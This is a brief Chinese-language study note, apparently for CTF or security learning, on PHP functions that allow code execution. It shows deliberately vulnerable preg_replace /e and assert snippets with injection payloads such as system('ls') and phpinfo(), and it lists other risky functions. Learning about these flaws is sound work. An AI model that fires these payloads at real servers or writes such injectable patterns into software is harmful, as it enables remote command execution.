-
preg_replace()
preg_replace($pattern, $replacement, $subject);
搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。
/e 模式,执行 $replacement部分的代码
例:
<?php
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET['pat'];
$replacement = $_GET['rep'];
$subject = $_GET['sub'];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
payload:
pat=/a/e&rep=system('ls');&sub=a
-
assert()
例1:
<?php
assert($_GET['a']);
?>
payload:
a=phpinfo()
例2:
<?php
$file=$_get['a'];
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
payload:
a') or phpinfo();//
- eval()
- call_user_func()
- call_user_fun_array()
- create_function()
- array_map
网友评论